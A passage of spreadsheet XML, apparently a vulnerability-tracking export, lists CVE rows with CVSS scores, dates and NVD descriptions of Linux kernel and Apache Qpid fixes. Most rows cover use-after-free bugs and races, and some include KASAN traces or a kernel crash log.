Users are recommended to upgrade to version 10.1.1, which fixes the issue.</t>
        </is>
      </c>
      <c r="T152" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92560</t>
        </is>
      </c>
    </row>
    <row r="153">
      <c r="A153" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B153" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C153" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92608</t>
        </is>
      </c>
      <c r="D153" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E153" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F153" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G153" s="5" t="inlineStr"/>
      <c r="H153" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I153" s="5" t="inlineStr"/>
      <c r="J153" s="5" t="inlineStr"/>
      <c r="K153" s="5" t="inlineStr"/>
      <c r="L153" s="5" t="inlineStr"/>
      <c r="M153" s="5" t="inlineStr"/>
      <c r="N153" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O153" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P153" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q153" s="5" t="inlineStr"/>
      <c r="R153" s="5" t="inlineStr">
        <is>
          <t>CWE-248</t>
        </is>
      </c>
      <c r="S153" s="5" t="inlineStr">
        <is>
          <t>Improper handling of property-encoding exceptions in AMQP 1.0-to-AMQP 0-10 message conversion allows authenticated message producers to disrupt delivery to AMQP 0-10 consumers via message properties that the target encoder does not handle correctly.
This issue affects Apache Qpid Broker-J: through 10.1.0.
Users are recommended to upgrade to version 10.1.1, which fixes the issue.</t>
        </is>
      </c>
      <c r="T153" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92608</t>
        </is>
      </c>
    </row>
    <row r="154">
      <c r="A154" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B154" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C154" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97523</t>
        </is>
      </c>
      <c r="D154" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E154" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F154" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G154" s="5" t="inlineStr"/>
      <c r="H154" s="5" t="inlineStr"/>
      <c r="I154" s="5" t="inlineStr"/>
      <c r="J154" s="5" t="inlineStr"/>
      <c r="K154" s="5" t="inlineStr"/>
      <c r="L154" s="5" t="inlineStr"/>
      <c r="M154" s="5" t="inlineStr"/>
      <c r="N154" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O154" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P154" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q154" s="5" t="inlineStr"/>
      <c r="R154" s="5" t="inlineStr"/>
      <c r="S154" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
mptcp: close race between scheduler and state change
The mptcp scheduler may race with subflow sockets state change: data
transmission on the selected socket may fail and a later release could
try to use mss_now reset to 0 for a divide operation.
Address the issue by explicitly checking for the critical scenario.</t>
        </is>
      </c>
      <c r="T154" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97523</t>
        </is>
      </c>
    </row>
    <row r="155">
      <c r="A155" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B155" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C155" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97524</t>
        </is>
      </c>
      <c r="D155" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E155" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F155" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G155" s="5" t="inlineStr"/>
      <c r="H155" s="5" t="inlineStr"/>
      <c r="I155" s="5" t="inlineStr"/>
      <c r="J155" s="5" t="inlineStr"/>
      <c r="K155" s="5" t="inlineStr"/>
      <c r="L155" s="5" t="inlineStr"/>
      <c r="M155" s="5" t="inlineStr"/>
      <c r="N155" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O155" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P155" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q155" s="5" t="inlineStr"/>
      <c r="R155" s="5" t="inlineStr"/>
      <c r="S155" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
mptcp: avoid unneeded actions on subflow reset
Once in a blue moon, the mptcp receive path can recursively call
mptcp_data_ready() via state change under unlucky error conditions, and
then try to hold the data lock again.
Break the recursion loop explicitly checking for the exceptional
condition.
Add a new flag instead of using an existing one like 'closing', to exit
early in subflow_state_change(), and explicitly flush the RX queue at
reset time.
This avoids unneeded processing to check for available data -- calling
get_mapping_status() and more on a dying subflow -- but also in error
reporting and worker scheduling.
Note that we must consume the currently peeked skb before invoking
mptcp_dss_corruption to avoid consuming it again after the eventual
reset has freed it.</t>
        </is>
      </c>
      <c r="T155" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97524</t>
        </is>
      </c>
    </row>
    <row r="156">
      <c r="A156" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B156" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C156" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97531</t>
        </is>
      </c>
      <c r="D156" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E156" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F156" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G156" s="5" t="inlineStr"/>
      <c r="H156" s="5" t="inlineStr"/>
      <c r="I156" s="5" t="inlineStr"/>
      <c r="J156" s="5" t="inlineStr"/>
      <c r="K156" s="5" t="inlineStr"/>
      <c r="L156" s="5" t="inlineStr"/>
      <c r="M156" s="5" t="inlineStr"/>
      <c r="N156" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O156" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P156" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q156" s="5" t="inlineStr"/>
      <c r="R156" s="5" t="inlineStr"/>
      <c r="S156" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
scsi: qla2xxx: Skip vport under deletion in report ID acquisition
qla24xx_report_id_acquisition() format-1 handling walks ha-&gt;vp_list under
vport_slock, takes a vref_count on the matching vport and calls
qla_update_host_map() to register its port id.
A vport teardown via qla24xx_vport_delete() sets VPORT_DELETE, then
qla24xx_disable_vp() removes the vport from the host_map btree and zeroes
vha-&gt;d_id (RESET_AL_PA). The vport is only unlinked from vp_list later,
in qla24xx_deallocate_vp_id(), which clears vp_map[idx] (RESET_VP_IDX)
but does not touch host_map. In the window in between, report ID
acquisition can still find the vport on vp_list and call
qla_update_host_map(); with d_id already zeroed it takes the
btree_insert32() path and re-inserts the dying vport into host_map.
Nothing cleans that entry afterwards, so once scsi_host_put() frees the
vha a later host_map lookup dereferences freed memory.
Skip a vport that has VPORT_DELETE set before taking the reference, so it
is neither re-registered nor scheduled for DPC re-registration. This
mirrors the existing guard in qla2x00_alert_all_vps().</t>
        </is>
      </c>
      <c r="T156" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97531</t>
        </is>
      </c>
    </row>
    <row r="157">
      <c r="A157" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B157" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C157" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97536</t>
        </is>
      </c>
      <c r="D157" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E157" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F157" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G157" s="5" t="inlineStr"/>
      <c r="H157" s="5" t="inlineStr"/>
      <c r="I157" s="5" t="inlineStr"/>
      <c r="J157" s="5" t="inlineStr"/>
      <c r="K157" s="5" t="inlineStr"/>
      <c r="L157" s="5" t="inlineStr"/>
      <c r="M157" s="5" t="inlineStr"/>
      <c r="N157" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O157" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P157" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q157" s="5" t="inlineStr"/>
      <c r="R157" s="5" t="inlineStr"/>
      <c r="S157" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
scsi: qla2xxx: Fix use-after-free of qpair work on queue teardown
The response queue MSI-X handler qla2xxx_msix_rsp_q() schedules
qla_do_work() via queue_work(ha-&gt;wq, &amp;qpair-&gt;q_work). qla_do_work()
dereferences the qpair (vha, rsp) and takes qpair-&gt;qp_lock.
During teardown, qla2xxx_delete_qpair() deletes the response queue, which
calls free_irq() in qla25xx_free_rsp_que(), and then frees the queue and
the qpair. free_irq() waits for running hardirq handlers but does not
cancel work already placed on ha-&gt;wq. A still-pending q_work then runs
qla_do_work() against the freed qpair and response queue, causing a
use-after-free. This is especially likely during full adapter teardown,
where destroy_workqueue(ha-&gt;wq) forces pending work to run after the queue
pairs have been freed.
Flush the work item with cancel_work_sync() in qla25xx_free_rsp_que()
after free_irq() has released the interrupt (so no new work can be
queued) and before the response queue and qpair memory are freed (so the
flushed handler still sees valid memory). Guard on rsp-&gt;qpair and ha-&gt;wq
to match the INIT_WORK() condition and avoid operating on an
uninitialized work_struct.</t>
        </is>
      </c>
      <c r="T157" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97536</t>
        </is>
      </c>
    </row>
    <row r="158">
      <c r="A158" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B158" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C158" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97557</t>
        </is>
      </c>
      <c r="D158" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E158" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F158" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G158" s="5" t="inlineStr"/>
      <c r="H158" s="5" t="inlineStr"/>
      <c r="I158" s="5" t="inlineStr"/>
      <c r="J158" s="5" t="inlineStr"/>
      <c r="K158" s="5" t="inlineStr"/>
      <c r="L158" s="5" t="inlineStr"/>
      <c r="M158" s="5" t="inlineStr"/>
      <c r="N158" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O158" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P158" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q158" s="5" t="inlineStr"/>
      <c r="R158" s="5" t="inlineStr"/>
      <c r="S158" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
smb: client: avoid leaking refcount in cifs_queue_oplock_break()
cifs_queue_oplock_break() unconditionally takes a reference on the
target file before queueing cifs_oplock_break(). Only that work item
decreases the reference counter again.
If another oplock break arrives while that work is still queued,
queue_work() will return false and not queue this second work item. As a
result, we will never reach the point to drop the file reference again
and are leaking this reference. This can be triggered when interacting
with a slow-responding server.
As a result, later unmount operations for this file system will fail with
  BUG: Dentry ... still in use (1) [unmount of cifs cifs]
  VFS: Busy inodes after unmount of cifs (cifs)
  kernel BUG at fs/super.c:777!
Fix this by only incrementing the reference count if the work has been
queued successfully. Taking it after queue_work() is safe because all
three callers hold tcon-&gt;open_file_lock across the call and
_cifsFileInfo_put() decrements under that same lock, so a worker that
starts the handler in the window cannot drop the reference before it has
been taken.</t>
        </is>
      </c>
      <c r="T158" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97557</t>
        </is>
      </c>
    </row>
    <row r="159">
      <c r="A159" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B159" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C159" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97562</t>
        </is>
      </c>
      <c r="D159" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E159" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F159" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G159" s="5" t="inlineStr"/>
      <c r="H159" s="5" t="inlineStr"/>
      <c r="I159" s="5" t="inlineStr"/>
      <c r="J159" s="5" t="inlineStr"/>
      <c r="K159" s="5" t="inlineStr"/>
      <c r="L159" s="5" t="inlineStr"/>
      <c r="M159" s="5" t="inlineStr"/>
      <c r="N159" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O159" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P159" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q159" s="5" t="inlineStr"/>
      <c r="R159" s="5" t="inlineStr"/>
      <c r="S159" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
smb: client: pin DFS superblock in iterator callback
tcon_super_cb() stores a raw superblock pointer, but __cifs_get_super()
takes its active reference only after iterate_supers_type() has dropped
s_umount and its passive reference. Concurrent DFS automount expiry can
therefore free the superblock before cifs_sb_active() uses it.
A deterministic KASAN test reproduces the race as:
  BUG: KASAN: slab-use-after-free in cifs_sb_active+0x77/0x80
The same test passes with this change applied.
Take the active reference in the callback while iterate_supers_type()
still holds s_umount shared. cifs_put_tcp_super() remains the matching
release.</t>
        </is>
      </c>
      <c r="T159" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97562</t>
        </is>
      </c>
    </row>
    <row r="160">
      <c r="A160" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B160" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C160" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97583</t>
        </is>
      </c>
      <c r="D160" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E160" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F160" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G160" s="5" t="inlineStr"/>
      <c r="H160" s="5" t="inlineStr"/>
      <c r="I160" s="5" t="inlineStr"/>
      <c r="J160" s="5" t="inlineStr"/>
      <c r="K160" s="5" t="inlineStr"/>
      <c r="L160" s="5" t="inlineStr"/>
      <c r="M160" s="5" t="inlineStr"/>
      <c r="N160" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O160" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P160" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q160" s="5" t="inlineStr"/>
      <c r="R160" s="5" t="inlineStr"/>
      <c r="S160" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
afs: Clear stale peer app data after address list changes
afs_fs_probe_fileserver() fetches the current endpoint state under
server-&gt;fs_lock, but leaves old_alist as NULL.  Consequently,
afs_set_peer_appdata() treats every address list replacement as initial
setup and only binds the new peers; it never unbinds peers removed from
the old list.
An address refresh can therefore proceed as follows.  CPU 0 replaces
server S's list and drops Pold without clearing Pold-&gt;app_data.  The
server destroyer then clears only S's current peers and lets S reach its
RCU callback.  After the callback frees S, CPU 1 handles a callback
through an RxRPC connection that still pins Pold, reads Pold-&gt;app_data,
and calls afs_use_server() on the freed object.
KASAN reported:
  BUG: KASAN: slab-use-after-free in afs_find_server+0x3c/0xa0
  Read of size 4 at addr ffff8881013e1af0 by task krxrpcio/7001/74
  Call Trace:
   afs_find_server+0x3c/0xa0
   afs_rx_new_call+0x15c/0x390
   rxrpc_new_incoming_call+0x97c/0x1730
   rxrpc_input_packet.constprop.0+0xd03/0xec0
   rxrpc_io_thread+0x967/0x1640
  Allocated by task 93:
   afs_lookup_server+0x1a7/0x14c0
   afs_alloc_server_list+0x43f/0xb60
   afs_create_volume+0x923/0x1490
   afs_get_tree+0x1c6/0x10a0
  Freed by task 0:
   kfree+0x131/0x3c0
   rcu_core+0x50a/0x1850
  Last potentially related work creation:
   __call_rcu_common.constprop.0+0x71/0xa10
   afs_put_server+0x213/0x2b0
Preserve old-&gt;addresses for the peer app-data update so that removed
peers are cleared before the endpoint state is replaced.  Also advance
both cursors when the old and new lists share a peer; activating the
old/new comparison without this would otherwise loop forever on the
shared entry.</t>
        </is>
      </c>
      <c r="T160" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97583</t>
        </is>
      </c>
    </row>
    <row r="161">
      <c r="A161" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B161" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C161" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97595</t>
        </is>
      </c>
      <c r="D161" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E161" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F161" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G161" s="5" t="inlineStr"/>
      <c r="H161" s="5" t="inlineStr"/>
      <c r="I161" s="5" t="inlineStr"/>
      <c r="J161" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K161" s="5" t="inlineStr"/>
      <c r="L161" s="5" t="inlineStr"/>
      <c r="M161" s="5" t="inlineStr"/>
      <c r="N161" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O161" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P161" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q161" s="5" t="inlineStr"/>
      <c r="R161" s="5" t="inlineStr"/>
      <c r="S161" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
mac802154: fix use-after-free of sdata via queued RX frames
The RX softirq producer ieee802154_subif_frame() queues received beacon
and MAC-command frames onto local-&gt;rx_beacon_list / rx_mac_cmd_list and
schedules a process-context worker, storing a raw mac_pkt-&gt;sdata (and
skb-&gt;dev == sdata-&gt;dev) with neither a reference nor any locking:
 - the lists have no lock: the softirq producer list_add_tail()s while the
   mac_wq worker list_del()s, so sibling interfaces on the same phy corrupt
   the list;
 - the workers dereference the interface after it may have been freed.
   mac802154_rx_mac_cmd_worker() touches mac_pkt-&gt;sdata directly, and
   mac802154_rx_beacon_worker() -&gt; mac802154_process_beacon() dereferences
   skb-&gt;dev (== sdata-&gt;dev). Removing an interface frees its sdata
   (netdev_priv) while a queued frame still points at it, so a later worker
   run is a use-after-free.
Reproduced under KASAN by flooding a victim interface with MAC command
frames and removing it (the beacon path is the same class via skb-&gt;dev):
  BUG: KASAN: slab-use-after-free in mac802154_rx_mac_cmd_worker+0x463/0x630 [mac802154]
  Read of size 4 at addr ffff888002f9ea18 by task kworker/u8:1/31
  Workqueue: phy0-mac-cmds mac802154_rx_mac_cmd_worker [mac802154]
  Call Trace:
   mac802154_rx_mac_cmd_worker+0x463/0x630 [mac802154]
   process_one_work+0x611/0xe80
   worker_thread+0x52e/0xdc0
   kthread+0x30c/0x630
   ret_from_fork+0x2fd/0x3e0
Fix both lists together:
 - add local-&gt;rx_lock and take it around every list access: the softirq
   producer (plain spin_lock, softirq context) and the workers and flush
   (spin_lock_bh, process context);
 - pin the interface for the lifetime of a queued frame with
   netdev_hold()/netdev_put(), so the worker can safely dereference sdata /
   skb-&gt;dev even while the interface is being removed;
 - dequeue under the lock at the head and loop-drain the whole list in the
   workers (they previously processed one frame per run and relied on a
   later enqueue to drain the rest);
 - drop not-yet-started frames of an interface before it is unregistered,
   from ieee802154_if_remove() (after the RCU grace period) and from the
   ieee802154_remove_interfaces() loop -- the latter is the whole-phy
   teardown path, which does not go through ieee802154_if_remove().
An in-flight worker that already dequeued a frame keeps its own netdev
reference; unregister_netdevice() then waits it out in netdev_run_todo(),
which runs at rtnl_unlock() (rtnl released) and after the interface has
been closed, so it does not pin rtnl. A worker blocked in an association
TX only delays that one interface's unregister (the usual "waiting for %s
to become free"), it does not hold rtnl. netdev_hold() is used for this
reason instead of a cancel_work_sync() under rtnl, which would block on
the worker's unbounded MLME TX wait via ieee802154_sync_queue().
The mac-command worker additionally skips processing for a stopped
interface (ieee802154_sdata_running()), avoiding a needless association
response during teardown.</t>
        </is>
      </c>
      <c r="T161" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97595</t>
        </is>
      </c>
    </row>
    <row r="162">
      <c r="A162" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B162" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C162" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97990</t>
        </is>
      </c>
      <c r="D162" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E162" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F162" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G162" s="5" t="inlineStr"/>
      <c r="H162" s="5" t="inlineStr"/>
      <c r="I162" s="5" t="inlineStr"/>
      <c r="J162" s="5" t="inlineStr"/>
      <c r="K162" s="5" t="inlineStr"/>
      <c r="L162" s="5" t="inlineStr"/>
      <c r="M162" s="5" t="inlineStr"/>
      <c r="N162" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O162" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P162" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q162" s="5" t="inlineStr"/>
      <c r="R162" s="5" t="inlineStr"/>
      <c r="S162" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
vdpa_sim_net: check TX pull result before RX copy
vringh_iov_pull_iotlb() returns a signed byte count.  A failed TX pull is
currently added to the unsigned byte counter and then passed as a size_t
length to receive_filter() and vringh_iov_push_iotlb().  A negative error
can therefore become a large length in the RX path.
Handle non-positive pull results before every length use.  Count the TX
error and complete the consumed TX descriptor with zero bytes.
I found this bug myself, though the patch was written with AI assistance.</t>
        </is>
      </c>
      <c r="T162" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97990</t>
        </is>
      </c>
    </row>
    <row r="163">
      <c r="A163" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B163" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C163" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98050</t>
        </is>
      </c>
      <c r="D163" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E163" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F163" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G163" s="5" t="inlineStr"/>
      <c r="H163" s="5" t="inlineStr"/>
      <c r="I163" s="5" t="inlineStr"/>
      <c r="J163" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K163" s="5" t="inlineStr"/>
      <c r="L163" s="5" t="inlineStr"/>
      <c r="M163" s="5" t="inlineStr"/>
      <c r="N163" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O163" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P163" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q163" s="5" t="inlineStr"/>
      <c r="R163" s="5" t="inlineStr"/>
      <c r="S163" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
mlxsw: spectrum_ptp: Fix napi_gro_receive() call from GC workqueue context
Currently mlxsw_sp1_ptp_ht_gc_collect() is run from the PTP
garbage-collection workqueue, rather than the NAPI poll context. For any
unmatched PTP entries carrying an SKB, it calls
mlxsw_sp1_ptp_unmatched_finish() -&gt; mlxsw_sp1_ptp_packet_finish(). For
ingress packets, this calls mlxsw_sp_rx_listener_no_mark_func(). The end
of that function is the following:
    skb-&gt;protocol = eth_type_trans(skb, skb-&gt;dev);
    napi_gro_receive(mlxsw_skb_cb(skb)-&gt;rx_md_info.napi, skb);
The napi pointer is one that was placed in the SKB control block when the
trapped packet was received in the NAPI context. Later, when the GC reaps
the unmatched entry (up to MLXSW_SP1_PTP_HT_GC_TIMEOUT later), the call to
napi_gro_receive() mutates the NAPI instance's GRO list, which is unsafe
if the poll is running concurrently on another CPU.
In mlxsw_sp1_ptp_ht_gc_collect(), local_bh_disable() is called to prevent
softirq processing, but this only applies to the local CPU. Additionally,
its comment is stale. It states that mlxsw_sp1_ptp_unmatched_finish()
invokes netif_receive_skb(). This has not been accurate since the
referenced commit; this patch makes that comment accurate again.
mlxsw_pci_napi_devs_init() calls netif_threaded_enable() on the NAPI RX
net_device without any conditions. The NAPI instance's poll, which may be
running concurrent to the GC, is running as an independently-scheduled
kthread which may be on a different CPU. The call to local_bh_disable()
does not guard against this.
If a tx-timestamp timeout produces an unmatched entry (which can be easily
reproduced by running ptp4l and waiting for a port to reach the
UNCALIBRATED/SLAVE state) while the owning NAPI thread is in the middle of
a poll on another CPU, both sides mutate the GRO list concurrently, as
shown below:
  [39.846] port 1 (swp1): MASTER to UNCALIBRATED on RS_SLAVE
  list_add corruption. next-&gt;prev should be prev (ffff8d620faf4138), but was ffff8d624150f700. (next=ffff8d620faf4138).
  kernel BUG at lib/list_debug.c:29!
  Oops: invalid opcode: 0000 [#1] SMP PTI
  CPU: 1 UID: 0 PID: 539 Comm: napi/mlxsw_rx-0 Not tainted 6.18.48 #1-NixOS PREEMPT(lazy)
  Hardware name: Mellanox Technologies Ltd. MSN2410/VMOD0001, BIOS 4.6.5 09/13/2018
  RIP: 0010:__list_add_valid_or_report+0x79/0xb0
  RSP: 0018:ffffcdf8c0f27c08 EFLAGS: 00010246
  RAX: 0000000000000075 RBX: ffff8d624150fd00 RCX: 0000000000000000
  RDX: 0000000000000000 RSI: 0000000000000001 RDI: ffff8d6315d1e540
  RBP: ffff8d620faf4070 R08: 0000000000000000 R09: 00000000ffffdfff
  R10: ffffffffa5c60fe0 R11: ffffcdf8c0f27ab8 R12: 0000000000000003
  R13: 000000000000003d R14: 00000000000001bc R15: 0000000000000001
  FS:  0000000000000000(0000) GS:ffff8d636f63f000(0000) knlGS:0000000000000000
  CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
  CR2: 0000562689a60c24 CR3: 000000015f224004 CR4: 00000000001726f0
  Call Trace:
  &lt;TASK&gt;
  gro_receive_skb+0xee/0x230
  mlxsw_sp1_ptp_got_packet+0x61/0x140 [mlxsw_spectrum]
  mlxsw_core_skb_receive+0xdf/0x1b0 [mlxsw_core]
  mlxsw_pci_napi_poll_cq_rx+0x780/0x9d0 [mlxsw_pci]
  __napi_poll+0x31/0x1e0
  napi_threaded_poll_loop+0x16b/0x1c0
  napi_threaded_poll+0x71/0xa0
  kthread+0xfb/0x260
  ret_from_fork+0x22d/0x260
